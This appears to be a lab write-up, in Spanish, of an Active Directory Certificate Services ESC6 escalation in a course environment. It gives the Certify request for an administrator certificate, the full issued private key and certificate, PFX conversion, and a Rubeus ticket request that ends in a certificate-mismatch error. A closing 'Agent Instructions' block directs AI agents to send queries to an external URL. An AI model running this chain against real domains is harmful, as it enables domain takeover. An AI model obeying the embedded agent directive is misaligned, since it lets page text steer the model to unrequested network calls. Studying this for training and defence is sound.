# AD CS - ESC6 ## Escalacion de Domain Admin La plantilla "CA-Integration" permite la inscripciĆ³n del grupo RDPUsers. Realizamos una solicitud de un certificado para DA (o EA) como student723. ``` PS C:\ad\tools\openssl> ..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"CA-Integration" /altname:administrator _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.0.0 [*] Action: Request a Certificates [*] Current user context : dcorp\student723 [*] No subject name specified, using current context as subject. [*] Template : CA-Integration [*] Subject : CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local [*] AltName : administrator [*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA [*] CA Response : The certificate had been issued. [*] Request ID : 35 [*] cert.pem : -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEA1iZ4dT7lOMIikGv3fnyFUA0rJ7lRZIe/YqRzkxAMKQrBiw5q MR4JHkdGaE7azxKKVEOj8MQiZCbChhJ/dfys7E/MlaPFKLEJ9QwhfV/C/wTwdrO6 prxZfFN9lbK5GfUAz1bVCwEJr5VNV+QnAaBQQdJ8OmE0/8e08Wohi1baS2vbJ0vw 3YXOhujLAMWh8D0wzW0vkp0gxve1Ca6suwkvAd0nRRvMp8OSRRRWtlouRSZvDHk+ NRYVB2hnjWxTN4SP4xcigWb1TvKV2HfMmRkcRO5kvXzz4wOTMTnBTIz0YCNvkDPh cvfgTcLNlNFGf50ThbrlX/KVUErHV03ud6nlAQIDAQABAoIBABSqGa2WqB/V++fb w0IdWe/jlWp743LD9p/aJpzmS4YaV5rHhU/ACjk1v4GJOmwI6fg/nq44/uiTJOoz FsGX5EfZW3CFIR1QGBnhVcn3V6WsIFgT98rnGet5UwEDAgGTNsTLKDurmferfI8i oPDzO0teuEYZ4zdbWgaBq0L62o20aXSnP97t0PHRkfz9levHKXxZ9xbOri2oRsyN /nJndXYXLl+5HmtzAY8NiFKWzxrVjRWuzD01ezkSjo9CvXFw6Wj9ObUi0IZh8lR7 bl2oDjoF3+9NyJonLDsXlF3iLnuSQBszRsXOL1xCIoUnuw3C+9pLMw7/VF+4m+zt BFxy79ECgYEA811MGZzvXUtQY6Mj+EIabbaPYSYamZKRkWtp6RKpFPUQ5+vaAQws Zi/ZRlNvj69iDjZkQ505nCisEO6WbH/F2mIJgiOmc83DmULLnpZjFir6yewWcFt/ /VGduR2ThxpCurzWUyjcyDWQ79EQoR4CaHDF2c9BI/dcxeGjs4esKXcCgYEA4UTe yZAGAyPaUG5TqPoyF/TihlZBO7wnIfch1FHU2oN2FfDWWpAJSXgzzYHg/1kucOXL EHPYPqLqA/daz7emTh7SQOXobv84rFWkSsnwpQaESNZZucasSyKnOf8amzAmghXH X5yl0JZvH19E7bNK79jsFa1rMZaVH9bHz1yCA0cCgYBlCpVwBPJ037IuzCtBBeEH MEbzZOiiXnJF2D0O4gqFgwJT6F6JFM7SVod1ZWrqUzz4/ag/UmX66gAWv5iAz8QL 2axs9fREHGhbl5oG7BWTvKCHeZgPak4HlP1RQHBiJYsTERhDSrHwBh15FGo9GsKR LlFXD2/SSP+hwP9AqNHYHQKBgQDSN5jH9DUIHR8Py8UafVDd9lKmFjwN6ImEMsFJ B4xg1ikOVI9UN/HSs+9zqe4znB+wj2CuW8zCtvk29k+yY6k4YZ7HnUUIv/c9KzaD 7Gs7NReheRaGPRZvj0kK4DsN8yMcZgKGAQLj4l6Uoi0KvTQDGyVFHW5Y+jLzYVVY 9vUE5QKBgEsYnROcFB9NTQmXrM61QjbbNlp7OSKrsphTa666t2JtptFSU6Y/eAuY eZO/2Npw4dDJfNphoXY3M73uW3RRcZRB8B+1k09K41ZrNf9EBJ1kYBz5b6+4rYIp Tn3MP+gmVNotd9t+Yr4a3ruPQEenjdz5oGV8w1ROofJpYado9sU0 -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIGsjCCBZqgAwIBAgITFQAAACMNkAZZnzrqQQAAAAAAIzANBgkqhkiG9w0BAQsF ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDUw MzA1MThaFw0yNTAzMDUwMzA1MThaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50NzIzMIIBIjAN BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1iZ4dT7lOMIikGv3fnyFUA0rJ7lR ZIe/YqRzkxAMKQrBiw5qMR4JHkdGaE7azxKKVEOj8MQiZCbChhJ/dfys7E/MlaPF KLEJ9QwhfV/C/wTwdrO6prxZfFN9lbK5GfUAz1bVCwEJr5VNV+QnAaBQQdJ8OmE0 /8e08Wohi1baS2vbJ0vw3YXOhujLAMWh8D0wzW0vkp0gxve1Ca6suwkvAd0nRRvM p8OSRRRWtlouRSZvDHk+NRYVB2hnjWxTN4SP4xcigWb1TvKV2HfMmRkcRO5kvXzz 4wOTMTnBTIz0YCNvkDPhcvfgTcLNlNFGf50ThbrlX/KVUErHV03ud6nlAQIDAQAB o4IDXjCCA1owPAYJKwYBBAGCNxUHBC8wLQYlKwYBBAGCNxUIheGocofMn2jhhyaC n65RgvL2fYE/gsD8U/nBbgIBZAIBDDApBgNVHSUEIjAgBggrBgEFBQcDAgYIKwYB BQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcVCgQo MCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkqhkiG 9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYFKw4D AgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFHic4MQ6+euKJmU7XcLg4tIL3Jd5MCgG A1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1UdIwQY MBaAFNH+jQqn+rQynzb8ILj3y55oxUXtMIHYBgNVHR8EgdAwgc0wgcqggceggcSG gcFsZGFwOi8vL0NOPW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1tY29ycC1kYyxD Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049 Q29uZmlndXJhdGlvbixEQz1tb25leWNvcnAsREM9bG9jYWw/Y2VydGlmaWNhdGVS ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv aW50MIHLBggrBgEFBQcBAQSBvjCBuzCBuAYIKwYBBQUHMAKGgatsZGFwOi8vL0NO PW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIw U2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tb25leWNv cnAsREM9bG9jYWw/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp ZmljYXRpb25BdXRob3JpdHkwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIB oDAELlMtMS01LTIxLTcxOTgxNTgxOS0zNzI2MzY4OTQ4LTM5MTc2ODg2NDgtMTM2 MDMwDQYJKoZIhvcNAQELBQADggEBAGugedCoeY8SyrO7gcdDgpDU9xHFsFqwZpoM Vez6wEtl0fQCrwg4gpUk/UKISkFIfb3Pzns7QzQEkBDI8Yyg26bnGKAhcqsAYh+r 7oyppzlm3UbNb6XMp2DjBV/PfRKrRx5vPINeFJJ+pRH5e48X9+3QS0eV/hK6omeL Rb/PTdkhrHzVvIvh8miJBw81d5dA6KV+qgdevE4vGcYZpx0OFKNjQDkJdSMzlXJb nAB2F69SBq6dzDy9NO0uTl2Cqm5ETqhsQsA3d4rTy4FOc9vueF5+ZDuEfu6Eozwe zD286p2cxPHQQgM56iczoMui94++W+DQT236eJ0L/JCTASz/rwg= -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Certify completed in 00:00:10.4666049 PS C:\ad\tools\openssl> .\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc6.pfx WARNING: can't open config file: /usr/local/ssl/openssl.cnf Enter Export Password: Verifying - Enter Export Password: PS C:\ad\tools\openssl> ..\Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:SecretPass@123 /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local [*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator' [*] Using domain controller: 172.16.2.1:88 [X] KRB-ERROR (66) : KDC_ERR_CERTIFICATE_MISMATCH PS C:\ad\tools\openssl> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-21/ad-cs-esc6.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.